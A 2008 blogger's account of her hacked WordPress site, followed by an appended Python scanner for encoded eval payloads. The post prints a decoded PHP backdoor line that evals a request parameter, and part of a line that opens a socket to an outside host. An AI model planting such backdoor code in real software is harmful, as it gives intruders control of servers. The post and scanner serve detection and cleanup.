By Jennifer 8. Lee | August 23, 2008
In poking around my blog because of layout issues, we discovered I had a bunch of spam links in my footer. Like a hundred links to latech.edu, with horrible things like cialis and viagra. About a month ago, I started noticing some very strange search queries bringing people to my site, like “pantyhose” and things I can’t write here (sexual acts, anatomy, and fluids and stuff) to my blog. I was perplexed. I didn’t use these terms. What was going on?
So today, it all became clear. Turned out I had been hacked, perhaps it had to do with some WordPress vulnerability. I felt really violated.
Anyway, in my templates: I went and looked in my header.php file on WordPress, and I was horrified to find something that started with this
Which is a “code” for normal text. Decoded it became this:
if(@$_REQUEST["A"] == "b" and isset($_REQUEST["C"])) eval(stripslashes(stripslashes($_REQUEST["C"])));
Which totally was sketchy. I also found another one, which I couldn’t decompress by myself.
That came to this:
$path="/blog";@$s = fsockopen ("pub.supercyborg.info",80);fputs($s,
I removed these and the spam was still there! And also, I switched out the theme, and it was still there. So it had to be in the WordPress files.
And we had just done a WordPress upgrade so all of the files had been recently updated — so we couldn’t look at timestamps to figure out which files had been touched. But you could do a search for the base64 phrase. It turned out that some of the WordPress files themselves had been infected, like wp-functions.php. And then another one of my files, template-functions-comments.php, was the one with all the bad things in it.
(blah). But luckily I have adorable high-quality tech help which purged it for me. I’m eternally grateful!
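The search for the base64 phrase described above can be scripted. The following is an added example, not code from the original post: a Python scanner that walks a directory, flags PHP files containing `eval(base64_decode(...))`, and decodes each payload for review without executing it. The `gzinflate` wrapper for the compressed variant, the sample directory layout, and all function names are assumptions.

```python
import base64, re, tempfile, zlib
from pathlib import Path

# Matches eval(base64_decode('...')) and eval(gzinflate(base64_decode('...'))).
# The gzinflate wrapper is an assumption; the post only says "decompress".
PATTERN = re.compile(
    r"""eval\s*\(\s*(gzinflate\s*\(\s*)?base64_decode\s*\(\s*['"]([A-Za-z0-9+/=\s]+)['"]""",
    re.IGNORECASE,
)

def decode_payload(blob, inflated):
    """Return the hidden PHP source as text, without ever executing it."""
    raw = base64.b64decode(blob)
    if inflated:
        raw = zlib.decompress(raw, -15)  # PHP gzinflate is a raw DEFLATE stream
    return raw.decode("utf-8", errors="replace")

def scan_tree(root):
    """Walk root and return (relative path, line number, decoded text) per hit."""
    hits = []
    for path in sorted(Path(root).rglob("*.php")):
        text = path.read_text(errors="replace")
        for m in PATTERN.finditer(text):
            line = text.count("\n", 0, m.start()) + 1
            try:
                decoded = decode_payload(m.group(2), bool(m.group(1)))
            except (ValueError, zlib.error) as exc:
                decoded = f"<undecodable: {exc}>"
            hits.append((path.relative_to(root).as_posix(), line, decoded))
    return hits

def build_sample_tree(root):
    """Constructed sample files in a hypothetical layout; payloads are harmless comments."""
    root = Path(root)
    (root / "wp-includes").mkdir(parents=True)
    plain = base64.b64encode(b"/* constructed payload 1 */").decode()
    comp = zlib.compressobj(wbits=-15)
    deflated = comp.compress(b"/* constructed payload 2 */") + comp.flush()
    packed = base64.b64encode(deflated).decode()
    (root / "header.php").write_text(f"<?php\n eval(base64_decode('{plain}')); ?>\n<html>\n")
    (root / "wp-includes" / "template-functions-comments.php").write_text(
        f"<?php\n// comment\n\neval(gzinflate(base64_decode(\"{packed}\")));\n")
    (root / "index.php").write_text("<?php echo 'clean'; ?>\n")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for rel, line, decoded in scan_tree(tmp):
            print(f"{rel}:{line}: {decoded}")
```

Because a content search does not depend on modification times, it still works after an upgrade has rewritten every file's timestamp.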